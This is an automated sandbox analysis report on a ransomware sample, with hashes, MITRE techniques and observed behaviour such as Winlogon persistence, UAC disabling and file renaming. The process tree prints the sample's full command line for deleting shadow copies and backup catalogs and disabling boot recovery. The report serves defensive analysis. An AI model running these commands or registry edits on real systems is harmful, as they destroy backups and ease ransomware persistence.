Overview
overview
10Static
static
100225a30270...24.exe
windows10-1703-x64
30225a30270...24.exe
windows7-x64
70225a30270...24.exe
windows10-2004-x64
30225a30270...24.exe
windows11-21h2-x64
305072a7ec4...7f.exe
windows10-1703-x64
1005072a7ec4...7f.exe
windows7-x64
1005072a7ec4...7f.exe
windows10-2004-x64
1005072a7ec4...7f.exe
windows11-21h2-x64
101fca1cd049...77.exe
windows10-1703-x64
11fca1cd049...77.exe
windows7-x64
11fca1cd049...77.exe
windows10-2004-x64
11fca1cd049...77.exe
windows11-21h2-x64
120bab94e6d...52.exe
windows10-1703-x64
120bab94e6d...52.exe
windows7-x64
120bab94e6d...52.exe
windows10-2004-x64
120bab94e6d...52.exe
windows11-21h2-x64
12704e269fb...66.exe
windows10-1703-x64
102704e269fb...66.exe
windows7-x64
102704e269fb...66.exe
windows10-2004-x64
102704e269fb...66.exe
windows11-21h2-x64
102cbb3497bf...2d.dll
windows10-1703-x64
102cbb3497bf...2d.dll
windows7-x64
102cbb3497bf...2d.dll
windows10-2004-x64
102cbb3497bf...2d.dll
windows11-21h2-x64
1037546b811e...f6.exe
windows10-1703-x64
1037546b811e...f6.exe
windows7-x64
1037546b811e...f6.exe
windows10-2004-x64
1037546b811e...f6.exe
windows11-21h2-x64
1049d828087c...2d.exe
windows10-1703-x64
149d828087c...2d.exe
windows7-x64
149d828087c...2d.exe
windows10-2004-x64
149d828087c...2d.exe
windows11-21h2-x64
1Analysis
-
max time kernel
1556s -
max time network
1557s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
18-05-2024 15:47
Behavioral task
behavioral1
Sample
0225a30270e5361e410453d4fb0501eb759612f6048ad43591b559d835720224.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
0225a30270e5361e410453d4fb0501eb759612f6048ad43591b559d835720224.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
0225a30270e5361e410453d4fb0501eb759612f6048ad43591b559d835720224.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral4
Sample
0225a30270e5361e410453d4fb0501eb759612f6048ad43591b559d835720224.exe
Resource
win11-20240426-en
Behavioral task
behavioral5
Sample
05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral8
Sample
05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe
Resource
win11-20240426-en
Behavioral task
behavioral9
Sample
1fca1cd04992e0fcaa714d9dfa97323d81d7e3d43a024ec37d1c7a2767a17577.exe
Resource
win10-20240404-en
Behavioral task
behavioral10
Sample
1fca1cd04992e0fcaa714d9dfa97323d81d7e3d43a024ec37d1c7a2767a17577.exe
Resource
win7-20240215-en
Behavioral task
behavioral11
Sample
1fca1cd04992e0fcaa714d9dfa97323d81d7e3d43a024ec37d1c7a2767a17577.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral12
Sample
1fca1cd04992e0fcaa714d9dfa97323d81d7e3d43a024ec37d1c7a2767a17577.exe
Resource
win11-20240426-en
Behavioral task
behavioral13
Sample
20bab94e6d9c8ed4832ce3b58f9150b16f9e5f40ffdcb747e10366cab5a30352.exe
Resource
win10-20240404-en
Behavioral task
behavioral14
Sample
20bab94e6d9c8ed4832ce3b58f9150b16f9e5f40ffdcb747e10366cab5a30352.exe
Resource
win7-20240221-en
Behavioral task
behavioral15
Sample
20bab94e6d9c8ed4832ce3b58f9150b16f9e5f40ffdcb747e10366cab5a30352.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral16
Sample
20bab94e6d9c8ed4832ce3b58f9150b16f9e5f40ffdcb747e10366cab5a30352.exe
Resource
win11-20240508-en
Behavioral task
behavioral17
Sample
2704e269fb5cf9a02070a0ea07d82dc9d87f2cb95e60cb71d6c6d38b01869f66.exe
Resource
win10-20240404-en
Behavioral task
behavioral18
Sample
2704e269fb5cf9a02070a0ea07d82dc9d87f2cb95e60cb71d6c6d38b01869f66.exe
Resource
win7-20240508-en
Behavioral task
behavioral19
Sample
2704e269fb5cf9a02070a0ea07d82dc9d87f2cb95e60cb71d6c6d38b01869f66.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral20
Sample
2704e269fb5cf9a02070a0ea07d82dc9d87f2cb95e60cb71d6c6d38b01869f66.exe
Resource
win11-20240508-en
Behavioral task
behavioral21
Sample
2cbb3497bfa28d9966c1feeae96d452d.dll
Resource
win10-20240404-en
Behavioral task
behavioral22
Sample
2cbb3497bfa28d9966c1feeae96d452d.dll
Resource
win7-20240508-en
Behavioral task
behavioral23
Sample
2cbb3497bfa28d9966c1feeae96d452d.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral24
Sample
2cbb3497bfa28d9966c1feeae96d452d.dll
Resource
win11-20240426-en
Behavioral task
behavioral25
Sample
37546b811e369547c8bd631fa4399730d3bdaff635e744d83632b74f44f56cf6.exe
Resource
win10-20240404-en
Behavioral task
behavioral26
Sample
37546b811e369547c8bd631fa4399730d3bdaff635e744d83632b74f44f56cf6.exe
Resource
win7-20240508-en
Behavioral task
behavioral27
Sample
37546b811e369547c8bd631fa4399730d3bdaff635e744d83632b74f44f56cf6.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral28
Sample
37546b811e369547c8bd631fa4399730d3bdaff635e744d83632b74f44f56cf6.exe
Resource
win11-20240426-en
Behavioral task
behavioral29
Sample
49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d.exe
Resource
win10-20240404-en
Behavioral task
behavioral30
Sample
49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d.exe
Resource
win7-20240508-en
Behavioral task
behavioral31
Sample
49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral32
Sample
49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d.exe
Resource
win11-20240426-en
General
-
Target
05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe
-
Size
1.4MB
-
MD5
0ada88218b67a313a4f5ab0062fbc4e6
-
SHA1
15dfcef932d666fdc7501bcee357ec2aabfcfdee
-
SHA256
05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f
-
SHA512
0b217e5aa8b17d347dbb05507cb5cf179328aad593fb65a8083ca8c300de4901eb55e6c8e971ce3280f50ceefd327332cfafde0280e09044d8da1dc8e20a49ed
-
SSDEEP
24576:J6w15zVAFj5WEx9+22sHFXVYmLmYy+vz236ZSV8BGxon3sgGhzl1KsIVy:QsV85WU9+ElYmyZMz23sSyBGdgelIsj
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe," 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (127) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe -
Drops desktop.ini file(s) 5 IoCs
description ioc Process File created C:\Users\Admin\Desktop\desktop.ini 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe File created C:\Users\Admin\Downloads\desktop.ini 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe File created C:\Users\Admin\Videos\desktop.ini 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe File created C:\Users\Admin\Music\desktop.ini 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe File created C:\Users\Admin\Pictures\desktop.ini 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe -
Modifies WinLogon 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShellExperience = "\"ShellExperience.exe\"" 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\Desktop\Wallpaper = "C:\\Program Files\\Temp\\AESRT\\AESRTback.png" 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files\Temp\AESRT\AESRTback.png 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe File opened for modification C:\Program Files\Temp\AESRT\refresh.bat 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2640 vssadmin.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeBackupPrivilege 2228 vssvc.exe Token: SeRestorePrivilege 2228 vssvc.exe Token: SeAuditPrivilege 2228 vssvc.exe Token: SeIncreaseQuotaPrivilege 1672 WMIC.exe Token: SeSecurityPrivilege 1672 WMIC.exe Token: SeTakeOwnershipPrivilege 1672 WMIC.exe Token: SeLoadDriverPrivilege 1672 WMIC.exe Token: SeSystemProfilePrivilege 1672 WMIC.exe Token: SeSystemtimePrivilege 1672 WMIC.exe Token: SeProfSingleProcessPrivilege 1672 WMIC.exe Token: SeIncBasePriorityPrivilege 1672 WMIC.exe Token: SeCreatePagefilePrivilege 1672 WMIC.exe Token: SeBackupPrivilege 1672 WMIC.exe Token: SeRestorePrivilege 1672 WMIC.exe Token: SeShutdownPrivilege 1672 WMIC.exe Token: SeDebugPrivilege 1672 WMIC.exe Token: SeSystemEnvironmentPrivilege 1672 WMIC.exe Token: SeRemoteShutdownPrivilege 1672 WMIC.exe Token: SeUndockPrivilege 1672 WMIC.exe Token: SeManageVolumePrivilege 1672 WMIC.exe Token: 33 1672 WMIC.exe Token: 34 1672 WMIC.exe Token: 35 1672 WMIC.exe Token: SeIncreaseQuotaPrivilege 1672 WMIC.exe Token: SeSecurityPrivilege 1672 WMIC.exe Token: SeTakeOwnershipPrivilege 1672 WMIC.exe Token: SeLoadDriverPrivilege 1672 WMIC.exe Token: SeSystemProfilePrivilege 1672 WMIC.exe Token: SeSystemtimePrivilege 1672 WMIC.exe Token: SeProfSingleProcessPrivilege 1672 WMIC.exe Token: SeIncBasePriorityPrivilege 1672 WMIC.exe Token: SeCreatePagefilePrivilege 1672 WMIC.exe Token: SeBackupPrivilege 1672 WMIC.exe Token: SeRestorePrivilege 1672 WMIC.exe Token: SeShutdownPrivilege 1672 WMIC.exe Token: SeDebugPrivilege 1672 WMIC.exe Token: SeSystemEnvironmentPrivilege 1672 WMIC.exe Token: SeRemoteShutdownPrivilege 1672 WMIC.exe Token: SeUndockPrivilege 1672 WMIC.exe Token: SeManageVolumePrivilege 1672 WMIC.exe Token: 33 1672 WMIC.exe Token: 34 1672 WMIC.exe Token: 35 1672 WMIC.exe Token: SeDebugPrivilege 2240 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 2240 wrote to memory of 2508 2240 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe 29 PID 2240 wrote to memory of 2508 2240 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe 29 PID 2240 wrote to memory of 2508 2240 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe 29 PID 2240 wrote to memory of 2508 2240 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe 29 PID 2508 wrote to memory of 2640 2508 cmd.exe 31 PID 2508 wrote to memory of 2640 2508 cmd.exe 31 PID 2508 wrote to memory of 2640 2508 cmd.exe 31 PID 2508 wrote to memory of 2640 2508 cmd.exe 31 PID 2508 wrote to memory of 1672 2508 cmd.exe 33 PID 2508 wrote to memory of 1672 2508 cmd.exe 33 PID 2508 wrote to memory of 1672 2508 cmd.exe 33 PID 2508 wrote to memory of 1672 2508 cmd.exe 33 PID 2240 wrote to memory of 1940 2240 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe 36 PID 2240 wrote to memory of 1940 2240 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe 36 PID 2240 wrote to memory of 1940 2240 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe 36 PID 2240 wrote to memory of 1940 2240 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe 36 PID 1940 wrote to memory of 792 1940 cmd.exe 38 PID 1940 wrote to memory of 792 1940 cmd.exe 38 PID 1940 wrote to memory of 792 1940 cmd.exe 38 PID 1940 wrote to memory of 792 1940 cmd.exe 38 PID 1940 wrote to memory of 792 1940 cmd.exe 38 PID 1940 wrote to memory of 792 1940 cmd.exe 38 PID 1940 wrote to memory of 792 1940 cmd.exe 38 PID 1940 wrote to memory of 1564 1940 cmd.exe 39 PID 1940 wrote to memory of 1564 1940 cmd.exe 39 PID 1940 wrote to memory of 1564 1940 cmd.exe 39 PID 1940 wrote to memory of 1564 1940 cmd.exe 39 PID 1940 wrote to memory of 1564 1940 cmd.exe 39 PID 1940 wrote to memory of 1564 1940 cmd.exe 39 PID 1940 wrote to memory of 1564 1940 cmd.exe 39 PID 1940 wrote to memory of 1656 1940 cmd.exe 40 PID 1940 wrote to memory of 1656 1940 cmd.exe 40 PID 1940 wrote to memory of 1656 1940 cmd.exe 40 PID 1940 wrote to memory of 1656 1940 cmd.exe 40 PID 1940 wrote to memory of 1656 1940 cmd.exe 40 PID 1940 wrote to memory of 1656 1940 cmd.exe 40 PID 1940 wrote to memory of 1656 1940 cmd.exe 40 PID 1940 wrote to memory of 1944 1940 cmd.exe 41 PID 1940 wrote to memory of 1944 1940 cmd.exe 41 PID 1940 wrote to memory of 1944 1940 cmd.exe 41 PID 1940 wrote to memory of 1944 1940 cmd.exe 41 PID 1940 wrote to memory of 1944 1940 cmd.exe 41 PID 1940 wrote to memory of 1944 1940 cmd.exe 41 PID 1940 wrote to memory of 1944 1940 cmd.exe 41 PID 1940 wrote to memory of 2928 1940 cmd.exe 42 PID 1940 wrote to memory of 2928 1940 cmd.exe 42 PID 1940 wrote to memory of 2928 1940 cmd.exe 42 PID 1940 wrote to memory of 2928 1940 cmd.exe 42 PID 1940 wrote to memory of 2928 1940 cmd.exe 42 PID 1940 wrote to memory of 2928 1940 cmd.exe 42 PID 1940 wrote to memory of 2928 1940 cmd.exe 42 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe"C:\Users\Admin\AppData\Local\Temp\05072a7ec455fdf0977f69d49dcaaf012c403c9d39861fa2216eae19c160527f.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Modifies WinLogon
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2240 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2640
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Program Files\Temp\AESRT\refresh.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True3⤵PID:792
-
-
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True3⤵PID:1564
-
-
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True3⤵PID:1656
-
-
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True3⤵PID:1944
-
-
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True3⤵PID:2928
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
268KB
MD592a48ac7dd5a294775a7eaef78471c0a
SHA160bb24b00c1854db86ce46ed4d2d76bf43a0403e
SHA2560ac5f7f06c21225d2ea5239998e34085fdc47f77b9c8e228245beb6291335b82
SHA5124fb0020b7fe79d4104fbf5de8cfce4294e58bb52fedb613dd023f91ee78db1065de2d9ef181f372c483abbb0827133f41fedd980559b2ebecf227ff2cdd79ffe
-
Filesize
378B
MD50c7022bc17761ecace63d45343c9d2fd
SHA17fdf53bc92830e4e5935f61d745a055edd3fc9e3
SHA25698ba9ab619027be3265fd7827270e1ec59fbe39b79f98c65c17712f667c7fe8a
SHA512ea434972b6fbffdf6c59e083cc1ed55557b4aa9113413f387b20c5eaf212a86ce995d4c8a93251cc22b9fd8b7ae4fc4125bbc85f5caca2dad8d81f4bb05dba5a